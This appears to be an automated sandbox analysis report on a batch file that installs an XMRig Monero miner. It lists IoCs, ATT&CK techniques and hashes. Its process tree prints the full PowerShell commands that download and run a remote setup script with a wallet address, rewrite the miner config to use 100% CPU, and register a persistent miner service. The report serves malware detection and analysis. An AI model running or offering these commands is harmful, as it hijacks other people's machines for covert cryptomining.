xmrig | a84009aa12f35d93284297647c2714df7f5b0a04d2e0732c689740920ea1421f

Analysis

max time kernel
149s
max time network
137s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
25-06-2024 16:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

vers1.bat
Size

393B
MD5

ece9925dc634f1cc20e3fd7ff7a144bd
SHA1

8816112e72b7b64a668bf7214999d855a7e05bde
SHA256

a84009aa12f35d93284297647c2714df7f5b0a04d2e0732c689740920ea1421f
SHA512

bf80fdf5fa8c00a0ddb773bed073d33b67bf6189b87b803f6fea7071e49dfdeb86cf2142175d9287fbc7bcfd639c42d848e9331f8bc7e68dacaaa33901432243

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 15 IoCs

miner

resource	yara_rule
behavioral2/files/0x000700000001abde-128.dat	family_xmrig
behavioral2/files/0x000700000001abde-128.dat	xmrig
behavioral2/memory/4308-131-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4304-415-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4304-416-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4304-417-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4304-418-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4304-419-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4304-420-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4304-428-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4304-429-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4304-430-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4304-431-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4304-432-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4304-433-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	216	powershell.exe
4	4820	powershell.exe
6	1988	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
4308	xmrig.exe
3576	nssm.exe
1536	nssm.exe
4472	nssm.exe
4504	nssm.exe
4084	nssm.exe
4708	nssm.exe
4196	nssm.exe
4304	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
1	raw.githubusercontent.com
2	raw.githubusercontent.com
4	raw.githubusercontent.com
6	raw.githubusercontent.com

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4684	sc.exe
4112	sc.exe
4444	sc.exe
3676	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4956	powershell.exe
4184	powershell.exe
4576	powershell.exe
1232	powershell.exe
1988	powershell.exe
5012	powershell.exe
1700	powershell.exe
216	powershell.exe
704	powershell.exe
2440	powershell.exe
5064	powershell.exe
208	powershell.exe
4820	powershell.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3988	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4696	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
216	powershell.exe
216	powershell.exe
216	powershell.exe
4820	powershell.exe
4820	powershell.exe
4820	powershell.exe
5012	powershell.exe
5012	powershell.exe
5012	powershell.exe
1232	powershell.exe
1232	powershell.exe
1232	powershell.exe
4956	powershell.exe
4956	powershell.exe
4956	powershell.exe
4184	powershell.exe
4184	powershell.exe
4184	powershell.exe
704	powershell.exe
704	powershell.exe
704	powershell.exe
2440	powershell.exe
2440	powershell.exe
2440	powershell.exe
5064	powershell.exe
5064	powershell.exe
5064	powershell.exe
1700	powershell.exe
1700	powershell.exe
1700	powershell.exe
208	powershell.exe
208	powershell.exe
208	powershell.exe
1988	powershell.exe
1988	powershell.exe
1988	powershell.exe
4576	powershell.exe
4576	powershell.exe
4576	powershell.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeDebugPrivilege	216	powershell.exe
Token: SeDebugPrivilege	4696	taskkill.exe
Token: SeDebugPrivilege	4820	powershell.exe
Token: SeDebugPrivilege	5012	powershell.exe
Token: SeDebugPrivilege	1232	powershell.exe
Token: SeDebugPrivilege	4956	powershell.exe
Token: SeDebugPrivilege	4184	powershell.exe
Token: SeDebugPrivilege	704	powershell.exe
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeDebugPrivilege	5064	powershell.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeDebugPrivilege	208	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	4576	powershell.exe
Token: SeLockMemoryPrivilege	4304	xmrig.exe
Token: SeDebugPrivilege	4700	taskmgr.exe
Token: SeSystemProfilePrivilege	4700	taskmgr.exe
Token: SeCreateGlobalPrivilege	4700	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4304	xmrig.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe
4700	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4768 wrote to memory of 216	4768	cmd.exe	75
PID 4768 wrote to memory of 216	4768	cmd.exe	75
PID 216 wrote to memory of 708	216	powershell.exe	76
PID 216 wrote to memory of 708	216	powershell.exe	76
PID 708 wrote to memory of 4444	708	cmd.exe	77
PID 708 wrote to memory of 4444	708	cmd.exe	77
PID 4444 wrote to memory of 4432	4444	net.exe	78
PID 4444 wrote to memory of 4432	4444	net.exe	78
PID 708 wrote to memory of 4380	708	cmd.exe	79
PID 708 wrote to memory of 4380	708	cmd.exe	79
PID 708 wrote to memory of 3380	708	cmd.exe	80
PID 708 wrote to memory of 3380	708	cmd.exe	80
PID 708 wrote to memory of 4144	708	cmd.exe	81
PID 708 wrote to memory of 4144	708	cmd.exe	81
PID 708 wrote to memory of 772	708	cmd.exe	82
PID 708 wrote to memory of 772	708	cmd.exe	82
PID 708 wrote to memory of 656	708	cmd.exe	83
PID 708 wrote to memory of 656	708	cmd.exe	83
PID 708 wrote to memory of 3676	708	cmd.exe	84
PID 708 wrote to memory of 3676	708	cmd.exe	84
PID 708 wrote to memory of 4684	708	cmd.exe	85
PID 708 wrote to memory of 4684	708	cmd.exe	85
PID 708 wrote to memory of 4696	708	cmd.exe	86
PID 708 wrote to memory of 4696	708	cmd.exe	86
PID 708 wrote to memory of 3988	708	cmd.exe	88
PID 708 wrote to memory of 3988	708	cmd.exe	88
PID 708 wrote to memory of 4820	708	cmd.exe	89
PID 708 wrote to memory of 4820	708	cmd.exe	89
PID 708 wrote to memory of 5012	708	cmd.exe	90
PID 708 wrote to memory of 5012	708	cmd.exe	90
PID 708 wrote to memory of 1232	708	cmd.exe	91
PID 708 wrote to memory of 1232	708	cmd.exe	91
PID 708 wrote to memory of 4308	708	cmd.exe	92
PID 708 wrote to memory of 4308	708	cmd.exe	92
PID 708 wrote to memory of 1068	708	cmd.exe	93
PID 708 wrote to memory of 1068	708	cmd.exe	93
PID 1068 wrote to memory of 4956	1068	cmd.exe	94
PID 1068 wrote to memory of 4956	1068	cmd.exe	94
PID 4956 wrote to memory of 2820	4956	powershell.exe	95
PID 4956 wrote to memory of 2820	4956	powershell.exe	95
PID 708 wrote to memory of 4184	708	cmd.exe	96
PID 708 wrote to memory of 4184	708	cmd.exe	96
PID 708 wrote to memory of 704	708	cmd.exe	97
PID 708 wrote to memory of 704	708	cmd.exe	97
PID 708 wrote to memory of 2440	708	cmd.exe	98
PID 708 wrote to memory of 2440	708	cmd.exe	98
PID 708 wrote to memory of 5064	708	cmd.exe	99
PID 708 wrote to memory of 5064	708	cmd.exe	99
PID 708 wrote to memory of 1700	708	cmd.exe	100
PID 708 wrote to memory of 1700	708	cmd.exe	100
PID 708 wrote to memory of 208	708	cmd.exe	101
PID 708 wrote to memory of 208	708	cmd.exe	101
PID 708 wrote to memory of 1988	708	cmd.exe	102
PID 708 wrote to memory of 1988	708	cmd.exe	102
PID 708 wrote to memory of 4576	708	cmd.exe	103
PID 708 wrote to memory of 4576	708	cmd.exe	103
PID 708 wrote to memory of 4444	708	cmd.exe	104
PID 708 wrote to memory of 4444	708	cmd.exe	104
PID 708 wrote to memory of 4112	708	cmd.exe	105
PID 708 wrote to memory of 4112	708	cmd.exe	105
PID 708 wrote to memory of 3576	708	cmd.exe	106
PID 708 wrote to memory of 3576	708	cmd.exe	106
PID 708 wrote to memory of 1536	708	cmd.exe	107
PID 708 wrote to memory of 1536	708	cmd.exe	107

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\vers1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7659.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:708
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4444
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:4432
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:4380
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:3380
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:4144
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:772
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:656
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:3676
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4684
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4696
  - - C:\Windows\system32\timeout.exe
      timeout 5
      4⤵
      Delays execution with timeout.exe
      PID:3988
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5012
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1232
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:4308
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1068
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4956
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:2820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Kzowysni\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1700
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:208
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1988
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4576
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4444
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4112
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:3576
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:1536
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:4472
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:4504
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:4084
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:4708

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:4196
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4304

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4700

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cf95dedb915336da5837929a72d6860c

SHA1
415b0ec5c17cab8e1839dc8a55fa958a67522f08

SHA256
7ab82f9284e4c0c041ea85fed7bffec28f8e553bd5818a764d3a0f0456878735

SHA512
28760b541f186bded324ff3969a6dc4e4c58d9efc81d6cf8fd22d3eec45bb747a91b72ed5da31f7c86dacf91eeaaa84962da9ba70aa056810ad5c130be1e17fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c359aadb8369a0fbfc3683bf954dea46

SHA1
22a217d1277b89b073e49f145b2e3882d64c880c

SHA256
32d51b3f95ef481d34a631669c9c4e36cf9809ecf1b2d530a7e89e1f127581a6

SHA512
b8c517a3cd18d249ce28718e42c2bbfc51f64bf4b85c5c261a198858cb686f038f2a296e9f2d55b430651da8ffac55e6615bd0c08d380c6e1c78b91e64fb3197

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
997915c8b982b5fb21355224f28a8969

SHA1
c7f6380bd2736661bd1489e393fa15b43a5c1791

SHA256
6e09b63efe05d11881eb2a9f238f4b042b5f4dc2dc270fbfcdbdfd170f4dd84e

SHA512
d50b7d973f25bb5c2add2e56be9ef00ac54f66b23a7477bf7996d3122666fb9fae05f08b27a4d85b984c06346f2637c129402ed584f8e533179bbc4a9d367b47

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fa0548c20f1b5cfa3eae1103d5fdee4a

SHA1
f3c57be33283b9e06da3c4d79199bf1e9b6594cb

SHA256
d7b47b16b719c0ff14f2e51a9a266b7ac52a11d9e575b78425c47abd0e9c1eac

SHA512
ac39ed5de1c9c1ede045fc35ad7ce5df8c7dc21d5bc6d543168033b3b529856b3442dcdeeedd4507b4fac7c9f6efbd7c7d4961a7f4b6a648d8a577d6f24675a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
11182fbb050c8c5cba2e4caaf51d3766

SHA1
abaf0dc0dcc24da8ee912a2363a5998fbee95491

SHA256
26476086eb6fe764cc78213c6ccecf981e8738dc6c6b475439d2cfbffec2b0fa

SHA512
bedac3054ae516fa19f9fe4647fc3eae3be69ab8df5efb4717cabee35d4dea9ee488bb18112688068059a01e4db8216379c99dd5c07338bd971b1c32a3c35525

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b8cfaa2799bc649b11685d50d06eca9f

SHA1
f9bbbb819b8e9f82e84b2ccd24107819791a49ec

SHA256
c1f1fc9f5ef2b6f1b08aac5b660238dad1829db01675568f09e85dc0c5ca5e21

SHA512
ce6eba8ace55dbbe287db0bd125275f7c68da470e826183250c0b45d6bc9b1d2a7079f5c70791190375ad630decb9ef98314cedc63c7d0af4d3231c607f9d77d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a57c8395cc9f9dce3464cc6ade0e3cf5

SHA1
785b612d9a4de80cf85159d5e8dd6b8557782a64

SHA256
077a0b54c24448f2310f8bfee032f4e048a7b2b0ab845a6248f43d0c3049327f

SHA512
da0827224b5f134f8d9d42e5e348d27ad74b33a337f6e3081136f8e776a3e2e4b930a008a48ca860e66832f8186515fc0c39e71944be984a4747ea21f52a880d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f0013e8583de56111257499a852b9ac2

SHA1
a16f3fe1015d835c0b0441a68b84e3e7c8a8345f

SHA256
